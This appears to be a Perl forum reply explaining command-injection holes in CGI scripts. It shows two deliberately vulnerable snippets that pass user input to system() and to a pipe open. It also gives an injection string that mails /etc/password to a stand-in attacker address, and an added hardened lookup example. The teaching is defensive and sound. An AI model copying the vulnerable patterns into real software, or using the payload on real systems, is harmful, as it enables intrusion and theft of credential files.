in reply to Re^2: Structing a Web site and security issues
in thread Structuring a Web site and security issues
The most brutal example of this and an injection attack hole I can think of would be something like:
```html
<!-- handwaving of HTML here... -->
<p> Type in the address you want to look up <input type="text" name="host_to_search_rq"> </p>
```

with the CGI of

```perl
use CGI;
my $cgi = CGI->new;
#
# Stuff left out....
my $hostname = $cgi->param('host_to_search_rq');
system("nslookup $hostname"); # BAD!!! BAD!!! BAD!!!  (unchecked input handed to a shell)
#
#
```
First off it is conceivable that the malicious hax0r has partially compromised your system already and has a script of their own named "nslookup" sitting in your path so you want to only invoke shell commands within your CGI using fully qualified pathnames to commands. That still doesn't fully get you off the hook, but it is a good start.
Secondly, having not checked the contents of $hostname and blindly executing the query leaves you open to an injection attack. A malicious induhvidual could enter the string ";cat /etc/password | /usr/ucb/Mail hax0rRus@hax0r.org" which then sends them the contents of your /etc/password file for a future brute force attack.
Another Dumb Idea® that I've actually seen folks do:
```perl
# Much handwaving again...
if (! $cgi->param('command_rq') ) {
    print $cgi->p("input a command: ", $cgi->textfield(-name => "command_rq") );
} else {
    # OH MY GOD!!! DON'T DO THIS!  (user input becomes the command of a pipe open)
    open PIPE, $cgi->param('command_rq') . "|" or die $!;
    my @results = <PIPE>;
    print $cgi->pre(@results);
}
```
Talk about asking for trouble!
Just a few ways to crash and burn in the world of CGI....
Just remember, the web is not the "village" it used to be any more. It has grown up into a very large urban area with hookers and muggers on quite a few of the street corners. You would use caution if you had to walk through someplace like that in the Real World™ and you certainly wouldn't leave your doors unlocked there or put valuables out on the front porch. If you can think of a way to break your own security (and you should try and think of ways) someone else can too.
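For contrast with the `system("nslookup $hostname")` snippet above, here is an added example (not from the post) of the same lookup done the defensive way: whitelist-validate the hostname with a regex (which also untaints it under `perl -T`), sanitize `%ENV`, and use the list form of `open` so no shell ever sees the input. The path `/usr/bin/nslookup` is an assumption; adjust it for your system.

```perl
#!/usr/bin/perl
# Run as "perl -T lookup.pl" to have Perl itself refuse tainted data in open/system.
use strict;
use warnings;

# Assumed location of the binary; adjust for your system. Always call
# commands by full path so a planted "nslookup" in $PATH is never found.
my $NSLOOKUP = '/usr/bin/nslookup';

# Sanitize the environment the child will inherit (the perlsec recipe).
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Return the hostname if it is syntactically plausible (DNS labels of
# letters, digits and hyphens, not starting or ending with a hyphen),
# otherwise undef. The regex capture also untaints the value under -T;
# ';', '|', spaces and the like can never get through.
sub clean_hostname {
    my ($h) = @_;
    return undef unless defined $h && length($h) <= 253;
    my ($clean) = $h =~ /\A([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?
                           (?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)\z/x;
    return $clean;
}

# Run the lookup without a shell: the list form of open passes each
# argument straight to execvp, so metacharacters are just bytes in argv.
# Returns a reference to the output lines, or undef if input was rejected.
sub safe_lookup {
    my ($input) = @_;
    my $host = clean_hostname($input);
    return undef unless defined $host;
    open(my $pipe, '-|', $NSLOOKUP, $host) or die "cannot run $NSLOOKUP: $!";
    my @lines = <$pipe>;
    close $pipe;
    return \@lines;
}

# Constructed inputs: one benign name and an injection string shaped like
# the one in the post (placeholder address).
for my $input ('www.example.com', ';cat /etc/passwd | /usr/ucb/Mail user@example.org') {
    my $host = clean_hostname($input);
    print defined $host ? "accepted: $host\n" : "rejected: $input\n";
}
```

Rejecting anything outside the whitelist is what makes this safe; the list-form `open` is the second line of defence in case a future change lets something odd through.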